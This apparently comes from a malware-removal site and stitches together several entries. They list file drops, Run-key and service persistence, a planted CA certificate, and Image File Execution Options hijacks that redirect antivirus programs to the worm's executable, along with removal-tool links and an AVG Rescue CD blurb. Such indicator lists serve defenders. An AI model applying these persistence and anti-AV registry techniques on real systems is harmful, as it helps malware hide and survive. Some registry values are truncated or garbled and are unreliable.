“javahr2″=”c:\\path\\javahr2.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
@=”"

[HKEY_LOCAL_MACHINE\SYSTEM\Select]
“teste”=”0″

Removal Tools :

Download Sus/Delf-J, Trojan.Heur.GZ.kGX@bKStsDeG Trojan removal tool that provided by VirusExperts.org from Here.

Related posts:

1. Removal tool for Win32.Genome.aocx (outlook.exe, brazilian.exe, sysinternals.exe) Trojan-Downloader
2. Removal tool for W32/VBSAuto-C, VBS/Slogod.X (Startup.scr, winxp.exe, winjpg.jpg, M.p.jpg) WORM
3. Removal tool for Troj/DwnLdr-ICI, Win32.Genome.aodo (windowsupdate.exe, updt.exe) Trojan

Submited By Diego
 

Severity Level : 6/10

Alias:

• Mal/FakeAV-CO [Sophos]
• Downloader-CEW [McAfee]
• NOT Detected [Kaspersky Lab]
• NOT Detected [Microsoft]

Vdk.exe VirusTotal Report : (Click Here)

File System Modifications

The following files were created in the system:

• %userprofile%\Local Settings\Temp\ Perflib_Perfdata_714.dat
  
• %userprofile%\Local Settings\Temp\ Vdj.exe
• %userprofile%\Local Settings\Temp\ Vdk.exe
• %userprofile%\Local Settings\Temp\Vdl.exe
• %userprofile%\Local Settings\Temp\ sshnas21.dll
• %systemroot%\ Vvavia.exe
• %systemroot%\Tasks\{35DC3473-A719-4d14-B7C1-FD326CA84A0C}.job
• %systemroot%\Tasks\{66BA574B-1E11-49b8-909C-8CC9E0E8E015}.job
• %system%\sshnas21.dll

Note:

• %system% is a variable that refers to the System folder. By default, this is “C:\Windows\System” (Windows 95/98/Me), “C:\Winnt\System32″ (Windows NT/2000), or “C:\Windows\System32″ (Windows XP).
• ? = Random file name.

Memory Modifications

There were new processes created in the system:

The following Internet action was started (the retrieved bits are saved into the local file):

Registry Modifications

The newly created or modified Registry Value is:

[HKEY_CURRENT_USER\Software\WEK9EMDHI9]

[HKEY_CURRENT_USER\Software\XML]

[HKEY_CURRENT_USER\Software\YVIBBBHA8C]

[HKEY_CURRENT_USER\Software\YVIBBBHA8C]
“Vj2″=”xC7aKZ+O6wyPlq1krRM4sG7m2LFGsYtHjHOagBf10Uk/n4gL8s8xs9LeD5KQVh3/j+XFa0mnr175UElKKyciA2gn6tUEA721Fj4P”

[HKEY_CURRENT_USER\Software\YVIBBBHA8C]
“Vj0″=”tSLPLpWL7R22spR48AI743bz2Kge8sEdwEqmsT37hAhii9o56M45qdHEQLL59eutSfWczpoAJiFx”

[HKEY_CURRENT_USER\Software\YVIBBBHA8C]
“Vj1″=”tSbFNJuL/h22spR48AI743bz2Kge8sEew1WeZUbE98hA0Rzkp3/l/FrHIYr5A4wiCO8Dph4h9+dbFwok9MptNDjCbOrr45GVFpV/sTDwF5BZNgDlPbNVQVn9lMwfvCcG4=”

[HKEY_CURRENT_USER\Software\YVIBBBHA8C]
“Vz4″=dword:00015180

[HKEY_CURRENT_USER\Software\YVIBBBHA8C]
“Vz5″=dword:00000002

[HKEY_CURRENT_USER\Software\YVIBBBHA8C]
“Vz2″=dword:01cacd45

[HKEY_CURRENT_USER\Software\YVIBBBHA8C]
“Vz3″=dword:e2940770

[HKEY_CURRENT_USER\Software\YVIBBBHA8C]
“Vz6″=dword:00000001

[HKEY_CURRENT_USER\Software\YVIBBBHA8C]
“Vz0″=dword:01cacc7f

[HKEY_CURRENT_USER\Software\YVIBBBHA8C]
“Vz1″=dword:123c6020

[HKEY_CURRENT_USER\Software\YVIBBBHA8C]
“Vj4″=”7SDUIc7NyUn+3vMc=”

[HKEY_CURRENT_USER\Software\Microsoft\Handle]

[HKEY_CURRENT_USER\Software\Microsoft\Handle]
“3″=”z+XaaugyuuSvEib0Hft72iB+UUk006BXeWC43zHlD+=”

[HKEY_CURRENT_USER\Software\Microsoft\Handle]
“7″=”z/Taa/pl0NCrJEynBu9+nW4ctjyqwoD34SzQye9W6i8cdZ5R0prC0V28U=”

[HKEY_CURRENT_USER\Software\Microsoft\Handle]
“5″=”z/DcO5EGvtLTXCm7FPhmgDwcNWID0/R+VgSJ5APKWrFlEp37TcOkOwzpj7qKzmXTMoC1URSbRM=”

[HKEY_CURRENT_USER\Software\Microsoft\Handle]
“8″=dword:ffffffff

[HKEY_CURRENT_USER\Software\Microsoft\Handle]
“6″=dword:ffffffff

[HKEY_CURRENT_USER\Software\Microsoft\Handle]
“4″=dword:00000005

[HKEY_CURRENT_USER\Software\Microsoft\Handle]
“12″=dword:01bc9309

[HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates\12D4872BC3EF019E7E0B6F132480AE29DB5B1CA3]

[HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\CA\Certificates\

12D4872,00,,732,30,30,39,2d,32,20,43,6,c9,5e,8,21,95,e4,d1,9c,50,435,3b,1e27,b0,e1,4d,34,7f,]

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count]
“HRZR_EHACNGU:P:\\Qbphzragf naq Frggvatf\\Nqzvavfgengbe\\Qrfxgbc\\ivqrb-cyhtva.45158.rkr”=hex:01,00,00,00,06,00,00,00,50,94,91,a6,7c,cc,ca,01,

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“YVIBBBHA8C”=”C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\Vdl.exe”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\Documents and Settings\\Administrator\\Desktop\\video-plugin.45158.exe”=”video-plugin.45158″

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\cmd.exe”=”Windows Command Processor”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}]
“SystemComponent”=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}]
“Installer”=”MSICD”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}\AvailableVersion]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}\AvailableVersion]
“Precache”=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}\AvailableVersion]
@=”7,0,19,0″

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}\DownloadInformation]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Code Store Database\Distribution Units\{D27CDB6E-AE6D-11CF-96B8-444553540000}\DownloadInformation]
“CODEBASE”=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab“

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RFC1156Agent\CurrentVersion\Parameters]
“TrapPollTimeMilliSecs”=dword:00003a98

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]
“Type”=dword:00000020

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]
“Start”=dword:00000002

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]
“ErrorControl”=dword:00000000

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]
“ImagePath”=hex(2):25,53,79,73,74,65,6d,52,6f,6f,74,25,63,68,6f,73,745,20,2d,6]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]
“DisplayName”=”SSHNAS”

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS]
“ObjectName”=”LocalSystem”

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS\Parameters]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS\Parameters]
“ServiceDll”=hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,73,2e,64,6c,6c,00,

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS\Security]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SSHNAS\Security]
“Security”=hex:01,00,14,80,90,0,04,00,00,00,00,00,14,00,fd,01,02,00,01,01,0,00,05,20,00,]

Removal Tools :

Download Mal/FakeAV-CO, Downloader-CEW Malware removal tool that provided by VirusExperts.org from Here.

Related posts:

1. Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware
2. Removal tool for Win32.Genome.aocx (outlook.exe, brazilian.exe, sysinternals.exe) Trojan-Downloader
3. Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware

The AVG Rescue CD is a powerful must-have toolkit for the rescue and repair of infected machines. It provides essential utilities for system administrators and other IT professionals and includes the following features:

• Comprehensive administration toolkit
• System recovery from virus and spyware infections
• Suitable for recovering MS Windows and Linux operating systems (FAT32 and NTFS file systems)
• Ability to perform a clean boot from CD or USB stick
• Free support and service for paid license holders of any AVG product
• FAQ and Free Forum self-help support for AVG Free users

Key technologies

• Anti-virus: protection against viruses, worms and Trojans
• Anti-spyware: protection against spyware, adware and identity theft
• Administration toolkit: system recovery tools

The AVG Rescue CD is essentially a portable version of AVG Anti-Virus supplied through Linux distribution. It can be used in the form of a bootable CD or bootable USB flash drive to recover your computer when the system cannot be loaded normally, such as after an extensive or deep-rooted virus infection. In short, the AVG Rescue CD enables you to fully remove infections from an otherwise inoperable PC and render the system bootable again.

Apart from the usual AVG functions (malware detection and removal, updates from internet or external device, etc.), the AVG Rescue CD also contains the following set of administration tools:

• Midnight Commander – a two-panel file manager
• Windows Registry Editor– simple registry editor for more experienced users
• TestDisk – powerful hard drive recovery tool
• Ping – to test the availability of network resources (servers, domains, IP addresses)
• Common Linux programs and services– vi text editor, OpenSSH daemon, ntfsprogs etc.

Free of charge

The AVG Rescue CD is a free-to-use product that anyone can download. This also covers any new program versions and virus database updates. If you have any other paid AVG license, you are also entitled to receive our full technical support.

Download:

Download Rescue CD (for CD creation)

Download Rescue CD (for USB stick)

Related posts:

1. BitDefender 2009 Rescue Disk CD
2. RegRun Reanimator – A powerful tool kit against Trojans, viruses, spyware, adware and rootkits
3. 60 Free Online Virus, Trojan, Spyware and Malware Scanners (Scan or Removal)

Severity Level : 4/10

Alias:

• W32/VBSAuto-C [Sophos]
• Script.Autorun.apd [McAfee]
• NOT Detected [Kaspersky Lab]
• Worm:VBS/Slogod.X [Microsoft]

M.p.jpg (MD5 : 6535e9edb9645ecb77abde2de4ae67f7) – VirusTotal Report : (Click Here)

File System Modifications

The following files were created in the system:

• %system%\Startup.scr
  
• %system%\Sys.dat
• %system%\winjpg.jpg
• %system%\winxp.exe

Note:

• %system% is a variable that refers to the System folder. By default, this is “C:\Windows\System” (Windows 95/98/Me), “C:\Winnt\System32″ (Windows NT/2000), or “C:\Windows\System32″ (Windows XP).
• ? = Random file name.

Memory Modifications

There were new processes created in the system:

Registry Modifications

The newly created or modified Registry Value is:

[HKEY_CLASSES_ROOT\exefile\shell\Open application]

[HKEY_CLASSES_ROOT\exefile\shell\Open application\command]

[HKEY_CLASSES_ROOT\exefile\shell\Open application\command]
@=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_CLASSES_ROOT\exefile\shell\Scan for virus,s]

[HKEY_CLASSES_ROOT\exefile\shell\Scan for virus,s\command]

[HKEY_CLASSES_ROOT\exefile\shell\Scan for virus,s\command]
@=”C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\winjpg.jpg”

[HKEY_CURRENT_USER\Software\Win]

[HKEY_CURRENT_USER\Software\Win]
“klg”=hex:01,

[HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host]

[HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]

[HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]
“DisplayLogo”=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings]
“Timeout”=dword:00000000

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\Shell32.DLL”=”Windows Shell Common Dll”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\Wscript.exe”=”Microsoft (R) Windows Based Script Host”

[HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache]
“C:\\WINDOWS\\system32\\winxp.exe”=”winxp”

[HKEY_LOCAL_MACHINE\SOFTWARE\Win]

[HKEY_LOCAL_MACHINE\SOFTWARE\Win]
“nck”=hex:e4,0e,a0,02,ad,2a,e5,57,26,c3,cd,74,fa,93,5b,67,

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Open application]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Open application\command]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Open application\command]
@=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Scan for virus,s]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Scan for virus,s\command]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\Scan for virus,s\command]
@=”C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\winjpg.jpg”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{36E0783A-90B6-BC95-68C5-BE20436E47EA}]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Active Setup\Installed Components\{36E0783A-90B6-BC95-68C5-BE20436E47EA}]
“stubpath”=hex(2):43,3a,5c,57,49,4e,44,4f,57,53,5c,73,79,73,74,65,6d,33,32,5c,53,74,61,72,74,75,70,2e,73,63,72,20,73,00,

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“regdiit”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
“CTFMON”=”C:\\WINDOWS\\system32\\wscript.exe /E:vbs C:\\WINDOWS\\system32\\winjpg.jpg”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\00hoeav.com]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\00hoeav.com]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\0w.com]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\0w.com]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.EXE]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360rpt.EXE]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.EXE]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safe.EXE]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safebox.EXE]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360safebox.EXE]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.EXE]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\360tray.EXE]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\6.bat]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\6.bat]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\6fnlpetp.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\6fnlpetp.exe]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\6x8be16.cmd]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\6x8be16.cmd]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2cmd.EXE]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2cmd.EXE]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2free.EXE]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2free.EXE]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2service.EXE]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2service.EXE]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2upd.EXE]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\a2upd.EXE]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\abk.bat]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\abk.bat]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Adobe Gamma Loader.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Adobe Gamma Loader.exe]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\algsrvs.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\algsrvs.exe]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\algssl.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\algssl.exe]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Angry.bat]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Angry.bat]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Anti-Trojan.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Anti-Trojan.exe]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTIARP.EXE]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ANTIARP.EXE]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antihost.exe]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\antihost.exe]
“Debugger”=”C:\\WINDOWS\\system32\\winxp.exe”

Removal Tools :

Download W32/VBSAuto-C – VBS/Slogod.X WORM Remover Tool that provided by VirusExperts.org from Here.

Related posts:

1. Removal tool for Mal/FakeAV-BW, Generic FakeAlert!hr, Packed.Win32.Krap.an (winupdate.exe, exec.exe, ppal.exe, MSe5ad.exe) Malware
2. Removal tool for Suspect-1B!E4800A5BF6F6, Mal/FakeAV-BW (ave.exe) Malware
3. Removal tool for Mal/FakeAV-CO, Downloader-CEW (Vvavia.exe, Vdl.exe, Vdk.exe, Vdj.exe) Malware